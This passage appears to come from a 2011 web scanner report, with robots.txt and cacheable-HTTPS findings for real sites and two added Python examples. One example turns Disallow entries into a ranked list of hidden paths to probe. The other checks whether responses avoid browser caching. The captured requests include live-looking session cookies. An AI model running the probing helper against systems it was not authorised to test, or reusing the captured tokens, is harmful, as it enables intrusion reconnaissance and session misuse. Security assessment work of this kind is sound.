GET /robots.txt HTTP/1.0
Host: www.znode.com

Response

HTTP/1.1 200 OK
Content-Length: 290
Content-Type: text/plain
Last-Modified: Fri, 13 May 2011 19:55:50 GMT
Accept-Ranges: bytes
ETag: "7a3a55c2a711cc1:3e07"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:05 GMT
Connection: close

User-agent: *
Disallow: /Admin/*
Disallow: /Activate/*
Disallow: /diagnostics.aspx
Disallow: /IntegrationTest.aspx
Disallow: /Data/Default/Logs/*
Disallow: /webservices/*
Disallow: /PlugIns/*

...[SNIP]...

26.130. http://www2.znode.com/analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.znode.com
Path:   /analytics

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.znode.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:10 GMT
Server: Apache
Last-Modified: Wed, 26 Mar 2008 21:11:01 GMT
ETag: "1a"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:10 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
X-Pardot-LB: lb-s2
Connection: close

#User-agent: *
#Disallow:

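The value of the robots.txt findings above is not the file itself but the Disallow entries, which hand a tester a list of paths the site owner would rather nobody visited (/builderSecret/, /bpddev/, /Admin/*, /Data/Default/Logs/*). The following parser turns a robots.txt body into an ordered probe list, handling the quirks visible in the captured responses: a missing space after the colon, rules commented out with '#', an empty Disallow that means "allow everything", wildcard patterns, a Disallow value without a leading slash, and per-bot groups. This is an added example written for this page, not code from the scanner or from any site listed; the APTURE and ZNODE texts are copied from the responses above, MIXED is constructed, and the SENSITIVE_HINTS list is the editor's assumption about what to probe first.

```python
"""robots.txt as an enumeration worklist (added example, not scanner code)."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from urllib.parse import urljoin

Rule = Tuple[str, str]  # ('allow' | 'disallow', path-or-pattern)


@dataclass
class RobotsRules:
    sitemaps: List[str] = field(default_factory=list)
    groups: Dict[str, List[Rule]] = field(default_factory=dict)  # agent -> rules


def parse_robots(text: str) -> RobotsRules:
    """Group rules by User-agent the way crawlers do: one or more User-agent
    lines open a group, the Allow/Disallow lines after them belong to every
    agent named, and a User-agent line following a rule starts a new group."""
    rules = RobotsRules()
    agents: List[str] = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # '#' starts a comment, so '#Disallow:' is inert
        if ':' not in line:
            continue
        name, _, value = line.partition(':')  # 'User-agent:*' has no space; partition copes
        name, value = name.strip().lower(), value.strip()
        if name == 'user-agent':
            if in_rules:
                agents, in_rules = [], False
            agents.append(value.lower())
            rules.groups.setdefault(value.lower(), [])
        elif name in ('allow', 'disallow'):
            in_rules = True
            for agent in agents:
                rules.groups[agent].append((name, value))
        elif name == 'sitemap':
            rules.sitemaps.append(value)
    return rules


def disallowed_paths(rules: RobotsRules, agent: str = '*') -> List[str]:
    """Disallow entries for one agent. An empty 'Disallow:' means 'allow all'
    and names no path, so it is skipped."""
    return [p for d, p in rules.groups.get(agent.lower(), []) if d == 'disallow' and p]


def candidate_urls(base: str, rules: RobotsRules, agent: str = '*') -> List[str]:
    """Turn Disallow entries into concrete URLs to request. A wildcard is a
    hint, not a path: '/Admin/*' is probed as '/Admin/'. A value with no
    leading slash ('Disallow: error404.aspx' above) is a misconfiguration that
    crawlers ignore; it is still worth probing relative to the root."""
    out: List[str] = []
    for path in disallowed_paths(rules, agent):
        probe = path.split('*', 1)[0].rstrip('$')
        if not probe.startswith('/'):
            probe = '/' + probe
        out.append(urljoin(base, probe))
    return list(dict.fromkeys(out))   # dedupe, keep file order


# Editor's assumption: name fragments that usually mark non-public functionality.
SENSITIVE_HINTS = ('admin', 'secret', 'dev', 'test', 'log', 'intranet', 'private',
                   'internal', 'monitor', 'invoice', 'backup', 'tmp', 'webservice',
                   'diagnostic')


def flag_sensitive(paths: List[str]) -> List[str]:
    """Paths whose name alone suggests something the owner wanted hidden."""
    return [p for p in paths if any(h in p.lower() for h in SENSITIVE_HINTS)]


# Copied from the captured www.apture.com and www.znode.com responses above.
APTURE = """User-agent: *
Disallow: /media/
Disallow: /builderSecret/
Disallow: /createSecret/
Disallow: /pluginSecret/
Disallow: /incrMagicLinkCount/
Disallow: /magiclinks/
Disallow: /createbar/checkscript/
"""
ZNODE = """User-agent: *
Disallow: /Admin/*
Disallow: /Activate/*
Disallow: /diagnostics.aspx
Disallow: /IntegrationTest.aspx
Disallow: /Data/Default/Logs/*
Disallow: /webservices/*
Disallow: /PlugIns/*
"""
# Constructed sample combining quirks seen across the findings; the sitemap URL is made up.
MIXED = """User-agent:*
Sitemap: http://www.example.test/sitemap.xml
Disallow: error404.aspx
Allow:/

User-agent: 008
Disallow: /

#User-agent: *
#Disallow:
"""

if __name__ == '__main__':
    for base, text in (('http://www.apture.com/', APTURE), ('http://www.znode.com/', ZNODE),
                       ('http://www.cnbc.com/', MIXED)):
        r = parse_robots(text)
        print(base, 'probe first:', flag_sensitive(disallowed_paths(r)))
        for url in candidate_urls(base, r):
            print('  ', url)
```

Treat the output as a worklist, not a finding: a Disallow line only tells you the owner did not want the path indexed, and each URL still has to be requested to learn whether it is protected, absent, or open.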
27. Cacheable HTTPS response
There are 41 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

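The check the scanner applies is simple but has one trap worth seeing in code: Cache-Control: private (finding 27.2 below) does not prevent local caching, because the browser cache is the private cache; only no-store keeps the body off disk, with Pragma: no-cache and Expires: 0 as companions for HTTP/1.0-era caches (RFC 7234 semantics, stated here by the editor). The following classifier reproduces that decision over raw responses, treating field names case-insensitively and reading only Cache-Control (bugzilla's Strict-Transport-Security also says max-age, and must not be confused with it). This is an added example, not scanner code; the three sample responses are trimmed copies of captured responses in this section, and the hardened header set is the editor's recommendation.

```python
"""Does this HTTPS response land in the browser's disk cache? (added example)"""
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

Headers = Dict[str, List[str]]  # lower-cased field name -> values in wire order


def parse_response_headers(raw: str) -> Tuple[str, Headers]:
    """Split a raw response into (status line, headers); the body is ignored.
    Names are case-insensitive, so they are lower-cased; repeated fields
    (two Set-Cookie lines, say) are kept as a list."""
    lines = raw.replace('\r\n', '\n').split('\n')
    headers: Headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                        # blank line ends the header block
        name, _, value = line.partition(':')   # first colon only: Date values contain colons
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0].strip(), headers


def cache_control_directives(headers: Headers) -> Dict[str, Optional[str]]:
    """Flatten every Cache-Control header into {directive: argument-or-None}."""
    out: Dict[str, Optional[str]] = {}
    for value in headers.get('cache-control', []):
        for token in value.split(','):
            token = token.strip().lower()
            if token:
                name, _, arg = token.partition('=')
                out[name.strip()] = arg.strip().strip('"') or None
    return out


def storage_verdict(headers: Headers) -> Tuple[str, str]:
    """Return (verdict, reason) for a private (browser) cache. Only
    'not-stored' keeps the body off disk; everything else is written and at
    most marked stale or revalidated before reuse."""
    cc = cache_control_directives(headers)
    if 'no-store' in cc:
        return 'not-stored', 'Cache-Control: no-store'
    if 'no-cache' in cc:
        return 'stored-must-revalidate', 'no-cache stores the body but revalidates before reuse'
    note = ' (private only restricts shared caches)' if 'private' in cc else ''
    if 'max-age' in cc and (cc['max-age'] or '').isdigit():
        seconds = int(cc['max-age'])
        if seconds == 0:
            return 'stored-stale', 'max-age=0 still allows a cached copy' + note
        return 'stored-fresh', f'fresh for {seconds}s by max-age' + note
    if 'expires' in headers and 'date' in headers:
        try:
            expires = parsedate_to_datetime(headers['expires'][0])
            now = parsedate_to_datetime(headers['date'][0])
        except (TypeError, ValueError):
            return 'stored-heuristic', 'unparseable Expires' + note
        if expires <= now:
            return 'stored-stale', 'Expires is not after Date' + note
        return 'stored-fresh', 'fresh until Expires' + note
    return 'stored-heuristic', 'no freshness directives; browser may cache heuristically' + note


def flag_cacheable_https(url: str, raw_response: str) -> Optional[str]:
    """Scanner-style check: only HTTPS responses matter, and a finding is
    raised unless the body is kept out of the cache. Returns one line or None."""
    if urlsplit(url).scheme.lower() != 'https':
        return None
    _, headers = parse_response_headers(raw_response)
    verdict, reason = storage_verdict(headers)
    return None if verdict == 'not-stored' else f'{url}: {verdict} ({reason})'


# Editor's recommendation for responses carrying sensitive content.
HARDENED_HEADERS = {'Cache-Control': 'no-store', 'Pragma': 'no-cache', 'Expires': '0'}


def hardened_response(body: str) -> str:
    """Build a raw response that sends HARDENED_HEADERS (for demonstration)."""
    return 'HTTP/1.1 200 OK\n' + ''.join(f'{k}: {v}\n' for k, v in HARDENED_HEADERS.items()) + '\n' + body


# Trimmed copies of captured responses shown in this section (27.1, 27.2, 27.5).
BUGZILLA = """HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Tue, 06 Sep 2011 17:06:19 GMT
X-frame-options: SAMEORIGIN

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
"""
ZETTANEER = """HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 17:06:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
"""
NETSUITE = """HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:10 GMT
Cache-Control: max-age=604800
Content-Type: application/octet-stream; charset=UTF-8

var mboxCopyright = "";
"""

if __name__ == '__main__':
    for url, raw in (('https://bugzilla.mozilla.org/show_bug.cgi', BUGZILLA),
                     ('https://deloitte.zettaneer.com/Subscriptions/', ZETTANEER),
                     ('https://forms.netsuite.com/core/media/media.nl', NETSUITE),
                     ('https://example.test/account', hardened_response('<html>secret</html>'))):
        print(flag_cacheable_https(url, raw) or f'{url}: ok')
```

The verdict is about the browser, not the network: a shared cache will honour private, but the scanner's threat is the next user of the same workstation reading the disk cache, and for that only no-store closes the finding.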

27.1. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Tue, 06 Sep 2011 17:06:19 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12117

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...

27.2. https://deloitte.zettaneer.com/Subscriptions/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://deloitte.zettaneer.com
Path:   /Subscriptions/

Request

GET /Subscriptions/ HTTP/1.1
Host: deloitte.zettaneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 17:06:29 GMT
Connection: close
Content-Length: 16121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--- EQCWEB3 --->
<html xmlns="http://www.w3.org/1999/xhtml">
<head><t
...[SNIP]...

27.3. https://dne.oracle.com/pls/uns/OPT_OUT.th

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dne.oracle.com
Path:   /pls/uns/OPT_OUT.th

Request

GET /pls/uns/OPT_OUT.th HTTP/1.1
Host: dne.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:33 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 2648
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Oracle</title>

</head>
<body bgcolor="#FFFFFF">
            <div align="center"><table border="0" width="750" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">


...[SNIP]...

27.4. https://event.on24.com/eventRegistration/prereg/register.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/prereg/register.jsp

Request

GET /eventRegistration/prereg/register.jsp HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Content-Length: 61
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close


Missing clientid parameter

27.5. https://forms.netsuite.com/core/media/media.nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /core/media/media.nl

Request

GET /core/media/media.nl?id=1363615&c=NLCORP&h=f5dd9535de84fa5de3cb&_xt=.js HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
Referer: https://forms.netsuite.com/app/site/crm/externalleadpage.nl?compid=NLCORP&formid=1113&h=540ef1b1bfbd86a9b34e&subsidiary=1&ck=Mhd7aqh5AbdCXidV&vid=Mhd7aqh5AbpCXgSl&cktime=96680&leadsource=g946&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315341196|session#1315341135013-154927#1315342996|PC#1315341135013-154927.19#1316550738; JSESSIONID=fHTcTm9CBLMJTHFQWbd8qqd81sbXKBcbnK8jsyHgY5NlMPHvvBHKrmGY0yLgRhCZjP6LNPZLjV0XY1NCNpVg6LvVX6517ztFTY6nvnmjQQ7bddV4GnyHHGHM5pCXsFhy!1517314966; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:10 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 23042
Content-Disposition: inline;filename="mbox.js"
NS_RTIMER_COMPOSITE: -110591142:616363742D6A6176613030362E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=996
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

var mboxCopyright = "&copy; 2004-2007 Offermatica &trade; Corporation";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f = null
...[SNIP]...

27.6. https://forums.oracle.com/forums/category.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/category.jspa

Request

GET /forums/category.jspa?categoryID=18 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 123998
Date: Tue, 06 Sep 2011 16:13:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Database</title>
<meta http-equiv="content-type" content="te
...[SNIP]...

27.7. https://forums.oracle.com/forums/guestsettings!default.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/guestsettings!default.jspa

Request

GET /forums/guestsettings!default.jspa HTTP/1.1
Host: forums.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 17:07:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=8d92100c30d7caf68638f82744638e708dcb2aab2d2d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums
Content-Length: 36286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Settings</title>
<meta http-equiv="content-type" conte
...[SNIP]...

27.8. https://forums.oracle.com/forums/main.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/main.jspa

Request

GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 246459
Date: Tue, 06 Sep 2011 16:13:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Home</title>
<meta http-equiv="content-type" content="
...[SNIP]...

27.9. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/feed-icon-14x14.jpg

Request

GET /forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:08 GMT
ETag: "5.5.30-ad155f4dae3c8bbb7b41e77153238054-503"
Content-Type: text/plain
Content-Length: 503
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

......JFIF.....G.G.....C...........    ...    .......

.

........................... ...C.............. ..........................................
...[SNIP]...

27.10. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/info_company.gif

Request

GET /forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-31aaea14c05fcefb6736e09849bcc8e4-1711"
Content-Type: text/plain
Content-Length: 1711
Date: Tue, 06 Sep 2011 16:13:19 GMT
Connection: keep-alive

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

27.11. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/oralogo_small.gif

Request

GET /forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-82f0a9b75571a56326f5d9340ef962ef-2059"
Content-Type: text/plain
Content-Length: 2059
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

27.12. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/otn_new.css

Request

GET /forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:10 GMT
ETag: "5.5.30-50ebcb915812177e8f99db0d9eb394bd-18986"
Content-Type: text/plain
Content-Length: 18986
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* MASTER FONT FACES */
BODY,H1,H2,H3,H4 {font-family:arial,helvetica,sans-serif;}

/* used to remove double space issue in pre tags*/
.jive-message-body pre br, textEditor pre br { display:none;
...[SNIP]...

27.13. https://forums.oracle.com/forums/themes/english/resources/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code.js

Request

GET /forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
